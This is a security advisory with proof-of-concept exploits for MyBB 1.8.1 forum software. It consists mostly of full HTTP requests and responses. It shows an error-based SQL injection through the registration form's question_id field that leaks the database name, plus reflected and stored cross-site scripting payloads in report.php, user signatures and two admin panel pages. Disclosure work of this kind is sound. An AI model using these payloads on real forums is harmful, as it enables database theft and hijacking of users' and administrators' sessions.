MyBB 1.8.1 Cross Site Scripting / SQL Injection

`#Title: MyBB 1.8.X - Multiple Vulnerabilities  
#Date: 13.11.2014  
#Tested on: Linux / Apache 2.2 / PHP 5 (localhost)  
#Vendor: mybb.com  
#Version: => 1.8.1 - Latest ATM  
#Contact: [email protected]  
#Author: Smash_  
  
  
Latest MyBB forum software suffers on multiple vulnerabilities, including SQL Injection and Cross Site Scripting. Such bugs may allow attacker to perform remote sql queries against the database, and so on.  
  
Sanitize your inputs ;)  
  
  
1. SQL Injection  
  
Vuln:  
POST 'question_id' - ID'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#  
  
#1 - Request (question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#):  
POST /mybb-1.8.1/member.php HTTP/1.1  
Host: localhost  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 408  
  
regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register  
  
#1 - Response:  
HTTP/1.1 503 Service Temporarily Unavailable  
Date: Thu, 13 Nov 2014 15:16:02 GMT  
<div id="content">  
<h2>MyBB SQL Error</h2>  
  
<div id="error">  
<p>MyBB has experienced an internal SQL error and cannot continue.</p><dl>  
<dt>SQL Error:</dt>  
<dd>1054 - Unknown column '9' in 'order clause'</dd>  
<dt>Query:</dt>  
SELECT q.*, s.sid  
FROM mybb_questionsessions s  
LEFT JOIN mybb_questions q ON (q.qid=s.qid)  
WHERE q.active='1' AND s.sid='C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' ORDER BY 9#'  
</dd>  
  
  
#2 - Request (question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#):  
POST /mybb-1.8.1/member.php HTTP/1.1  
Host: localhost  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 409  
  
regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register  
  
#2 - Response:  
HTTP/1.1 200 OK  
Date: Thu, 13 Nov 2014 15:21:15 GMT  
(...)  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- start: member_register -->  
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">  
<head>  
<title>Forums - Registration</title>  
  
  
#3 - Request (Final POC):  
POST /mybb-1.8.1/member.php HTTP/1.1  
Host: localhost  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 475  
  
regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register  
  
#3 - Response:  
HTTP/1.1 503 Service Temporarily Unavailable  
Date: Thu, 13 Nov 2014 15:24:34 GMT  
(...)  
<div id="content">  
<h2>MyBB SQL Error</h2>  
  
<div id="error">  
<p>MyBB has experienced an internal SQL error and cannot continue.</p><dl>  
<dt>SQL Error:</dt>  
<dd>1062 - Duplicate entry 'mybb:1' for key 'group_key'</dd>  
<dt>Query:</dt>  
<dd>  
SELECT q.*, s.sid  
FROM mybb_questionsessions s  
LEFT JOIN mybb_questions q ON (q.qid=s.qid)  
WHERE q.active='1' AND s.sid='-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' or 1 group by concat_ws(0x3a,database(),floor(rand(0)*2)) having min(0) or 1#'  
</dd>  
</dl>  
(...)  
  
  
  
2. Cross Site Scripting  
  
a) Reflected XSS - Report post  
  
Vuln:  
GET 'type' - XSS"><script>alert(666)</script>  
  
localhost/mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1  
  
Request:  
GET /mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1 HTTP/1.1  
Host: localhost  
  
Response:  
HTTP/1.1 200 OK  
Set-Cookie: sid=27ec1f0b75b3c6b9d852e6614144a452; path=/mybb-1.8.1/; HttpOnly  
Content-Length: 1247  
Content-Type: text/html  
  
<div class="modal">  
<div style="overflow-y: auto; max-height: 400px;" class="modal_0">  
<form action="report.php" method="post" class="reportData_0" onsubmit="javascript: return Report.submitReport(0);">  
<input type="hidden" name="my_post_key" value="c08308117fcadae6609372f46fa97835" />  
<input type="hidden" name="action" value="do_report" />  
<input type="hidden" name="type" value="XSS"><script>alert(666)</script>" />  
<input type="hidden" name="pid" value="0" />  
  
  
b) Stored XSS - Signature  
  
Vuln:  
POST 'signature' - [video=youtube]http://youtube.com?"+xss="true"+666="[/video]  
  
#1 - Request (change signature):  
POST /mybb-1.8.1/usercp.php HTTP/1.1  
Host: localhost  
Referer: http://localhost/mybb-1.8.1/usercp.php?action=editsig  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 203  
  
my_post_key=c08308117fcadae6609372f46fa97835&signature=%5Bvideo%3Dyoutube%5Dhttp%3A%2F%2Fyoutube.com%3F%22+xss%3D%22true%22+666%3D%22%5B%2Fvideo%5D&updateposts=0&action=do_editsig&submit=Update+Signature  
  
#2 - Request (user's profile):  
GET /mybb-1.8.1/member.php?action=profile&uid=2 HTTP/1.1  
Host: localhost  
Referer: http://localhost/mybb-1.8.1/usercp.php?action=editsig  
  
#2 - Response:  
HTTP/1.1 200 OK  
Set-Cookie: sid=e68f1b6fab0737d7057b546e24d8106e; path=/mybb-1.8.1/; HttpOnly  
Content-Length: 12740  
Content-Type: text/html; charset=UTF-8  
(...)  
<table border="0" cellspacing="0" cellpadding="5" class="tborder tfixed">  
<tr>  
<td class="thead"><strong>user's Signature</strong></td>  
</tr>  
<tr>  
<td class="trow1 scaleimages">[Video: <a href="http://youtube.com?" xss="true" 666="" target="_blank">http://youtube.com?" xss="true" 666="</a>]</td>  
</tr>  
</table>  
<br />  
  
  
c) Reflected XSS - Templates (AP)  
  
Vuln:  
GET 'title' - title"><script>alert(666)</script>  
  
localhost/mybb-1.8.1/admin/index.php?module=style-templates&action=edit_template&title=calendar"><script>alert(666)</script>&sid=1&expand=1  
  
Request:  
GET /mybb-1.8.1/admin/index.php?module=style-templates&action=edit_template&title=calendar%22%3E%3Cscript%3Ealert(666)%3C/script%3E&sid=1&expand=1 HTTP/1.1  
Host: localhost  
  
Response:  
HTTP/1.1 200 OK  
(...)  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head profile="http://gmpg.org/xfn/1">  
<title>Editing Template: calendar"><script>alert(666)</script></title>  
  
  
d) Reflected XSS - Languages (AP)  
  
Vuln:  
GET 'file' - <a onmouseover=alert(666)>woot  
  
localhost/mybb-1.8.1/admin/index.php?module=config-languages&action=edit&lang=english&editwith=&file=<a onmouseover=alert(666)>woot  
  
Request:  
GET /mybb-1.8.1/admin/index.php?module=config-languages&action=edit&lang=english&editwith=&file=%3Ca%20onmouseover=alert(666)%3Ewoot HTTP/1.1  
Host: localhost  
  
Response:  
HTTP/1.1 200 OK  
(...)  
<a href="index.php?module=config-languages">Languages</a> » <a href="index.php?module=config-languages&action=edit&lang=english">English (American)</a> » <span class="active"><a onmouseover=alert(666)>woot</span>  
(...)  
<div class="title"><a onmouseover=alert(666)>woot</div>  
  
`